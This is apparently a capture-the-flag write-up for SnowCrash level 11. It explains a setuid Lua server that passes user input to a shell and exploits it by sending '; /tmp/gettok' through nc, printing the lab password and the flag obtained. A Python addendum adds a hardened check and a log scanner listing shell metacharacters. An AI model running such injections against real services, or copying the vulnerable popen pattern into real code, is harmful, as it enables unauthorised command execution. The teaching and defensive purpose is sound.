
# Level 11

## How to login

username: level11

password: feulo4b72j7edeahuete3no7c

## Goal

Run `getflag` as user flag11.

## Actually doing something

```console
level11@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level11 level11  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level11 level11  220 Apr  3  2012 .bash_logout*
-r-x------  1 level11 level11 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x  1 flag11  level11  668 Mar  5  2016 level11.lua*
-r-x------  1 level11 level11  675 Apr  3  2012 .profile*
```

A setuid script? Something seems fishy, let's open it:

```lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end
```

It seems to be a server listening on port 5151 that asks for a password, checks whether it is correct, and does something?

Looking at the `hash` function, we see a nice little shell injection opportunity: the password is concatenated straight into the command string passed to `io.popen`, so anything we send is executed by the shell. Let's try something :D

We want something that writes the `getflag` output somewhere, like we did before.

What about the same script:

```console
level11@SnowCrash:~$ cat <<EOF >/tmp/gettok
#!/bin/sh
getflag >/tmp/flag
chmod 777 /tmp/flag
EOF
level11@SnowCrash:~$ chmod +x /tmp/gettok
level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151
Password: Erf nope..
level11@SnowCrash:~$ cat /tmp/flag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
```

And voilà :D
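As an added illustration (not part of the level or of this writeup's own tooling), the snippet below reproduces how `level11.lua` builds its `popen` string without executing it, shows a hardened check that computes the same SHA-1 in-process so no shell is involved, and scans the server's `trying ...` log lines for inputs carrying shell metacharacters. It assumes Python 3 with only the standard library, and that the original passwords were plain words (so `echo` just appended a newline before `sha1sum` read them).

```python
import hashlib

# Digest the server compares against (taken from level11.lua above).
EXPECTED = "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0"

# Characters that let a "password" turn `echo <pass> | sha1sum` into extra commands.
SHELL_META = frozenset(";&|`$(){}<>'\"\\")

# Constructed sample of what the server prints to its terminal (line 54 of the script).
SAMPLE_LOG = "trying hunter2\ntrying ; /tmp/gettok\ntrying correct horse\n"


def unsafe_command(password):
    """Mirror the original string concatenation; returned for inspection, never run."""
    return "echo " + password + " | sha1sum"


def safe_hash(password):
    """Same hex digest `echo <pass> | sha1sum` yields for a plain password,
    computed in-process: echo appends '\\n', sha1sum hashes the bytes it reads."""
    return hashlib.sha1((password + "\n").encode()).hexdigest()


def check_password(password):
    """Hardened replacement for the Lua comparison: no shell, no string splicing."""
    return safe_hash(password) == EXPECTED


def suspicious_attempts(log_text):
    """Return the logged inputs that contain shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        if line.startswith("trying "):
            attempt = line[len("trying "):]
            if any(ch in SHELL_META for ch in attempt):
                hits.append(attempt)
    return hits
```

With the injected input from the writeup, `unsafe_command` shows the shell seeing two commands, `echo` and `/tmp/gettok`, whose output is what ends up piped into `sha1sum`.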